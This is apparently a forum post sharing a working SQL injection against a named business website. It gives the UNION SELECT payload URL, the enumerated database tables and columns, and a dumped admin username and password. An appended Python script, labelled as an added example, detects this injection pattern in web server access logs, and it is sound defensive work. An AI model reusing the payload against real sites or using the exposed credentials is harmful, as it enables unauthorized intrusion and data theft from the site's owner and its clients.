Here's an SQLi. I didn't post it because there's anything special in it, but because the approach was funny and was "harder" to pull off.
Vulnerable Column: 3
MySQL Version: <5
DBs: information_schema,bluemonkeycms-
Current DB: bluemonkeycms-
Tables: admin,clients,content,events,files,gallery,gallery_cat,home,modlink,modules,news,newsletters,prj_categories,project,projects,subscribers,users,vehicles -http://www.reaplasrack.co.uk/content.php?id=-129%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Columns: id,name,password,clientid,clientname,email,username,password,hdrallow,hdrwidth,hdrheight,id_content,title,content,clientid,cssfile,parent,parentid,hdrfile,id_news,start_date,end_date,headline,teaser,content,clientid,filename,id,filename,description,clientid,id_gallery,id_gallery_cat,filename,caption,description,clientid,alturl,id_gallery_cat,gallery_name,clientid,gallery_description,id_home,title,content,ID,clientid,modid,module_id,mod_txt,mod_url,active,id_news,start_date,end_date,headline,teaser,content,clientid,filename,id,clientid,content,headline,category_id,category_name,category_desc,client_id,id,name,description,cat_id,id_news,start_date,end_date,headline,teaser,content,clientid,filename,category_id,id,name,emailaddress,clientid,username,password,accesslevel,id_users,id,veh_type,veh_desc,veh_make,veh_model,veh_spec,veh_body,veh_engine,veh_transmission,veh_reg,veh_owners,veh_mileage,veh_history,veh_fuel,veh_price,image1,image2,image3,image4 -
Admin Table User and Pass: 1:admin:admin:-
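Added example, not part of the original post: a detector that URL-decodes the query string of each access-log line and flags the markers visible in the request quoted above (a non-integer `id`, `union all select`, `information_schema`, `group_concat(`, a trailing `--`). The log format, the `INT_PARAMS` set, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers taken from the request quoted in the post (matched after URL-decoding).
MARKERS = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "trailing-comment": re.compile(r"(?:--|#)\s*$"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_PARAMS = {"id"}  # assumption: parameters the application treats as integers


def inspect_line(log_line):
    """Return (param, [reasons]) tuples for suspicious query parameters."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = [tag for tag, rx in MARKERS.items() if rx.search(value)]
        if name in INT_PARAMS and not re.fullmatch(r"\d+", value):
            reasons.insert(0, "non-integer")
        if reasons:
            findings.append((name, reasons))
    return findings


# Constructed sample log lines (addresses are documentation placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /content.php?id=129 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /content.php?id=-129%20union%20all%20select%201,2,'
    'group_concat%28table_name%29,4,5,6,7,8%20from%20information_schema.tables'
    '%20where%20table_schema=database%28%29-- HTTP/1.1" 200 6200',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?title=union%20news HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, reasons in inspect_line(line):
            print(f"{line.split()[0]} {param}: {', '.join(reasons)}")
```

The non-integer check on `id` is the strongest signal here, since it fires regardless of how the SQL keywords are spelled or encoded; the keyword markers only add context for triage.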